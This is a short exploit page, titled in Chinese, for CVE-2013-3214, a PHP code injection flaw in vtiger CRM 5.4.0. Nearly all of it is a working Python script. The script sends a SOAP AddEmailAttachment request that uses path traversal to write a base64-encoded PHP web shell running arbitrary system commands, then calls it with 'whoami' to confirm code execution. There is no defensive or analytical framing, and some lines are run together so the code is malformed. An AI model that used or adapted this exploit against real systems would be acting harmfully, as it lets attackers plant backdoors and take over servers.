CVE-2013-3214 vtiger CRM 5.4.0 PHP代碼注入漏洞
EXP
#!/usr/bin/env python3
import requests
from base64 import b64encode
# parameters depend on environment.
host = '192.168.85.133'
port = 8888
uri = '/'
url = f'http://{host}:{port}{uri}vtigerservice.php?service=outlook'
headers = {'Content-Type': 'text/xml', 'charset': 'UTF-8'}
payload = """
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "";
die;
} ?> """
encoded_payload = b64encode(payload.encode()).decode() filename = "cmd.php"
data = f""" <soapenv:Envelope xmlns:crm="http://www.vtiger.com/products/crm" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <soapenv:Header/> <soapenv:Body> <crm:AddEmailAttachment soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <emailid xsi:type="xsd:string">ptFINT</emailid> <filedata xsi:type="xsd:string">{encoded_payload}</filedata> <filename xsi:type="xsd:string">../../../../../../{filename}</filename> <filesize xsi:type="xsd:string">{len(payload)}</filesize> <filetype xsi:type="xsd:string">php</filetype> <username xsi:type="xsd:string">Pbghh</username> <session xsi:type="xsd:string"/> </crm:AddEmailAttachment> </soapenv:Body> </soapenv:Envelope> """
- send the requests
print("Sending ...") print(data) requests.post(url, headers=headers, data=data)
print("Test command whoami ...") resp = requests.get(f'http://{host}:{port}{uri}{filename}?cmd=whoami')
print(resp.text)
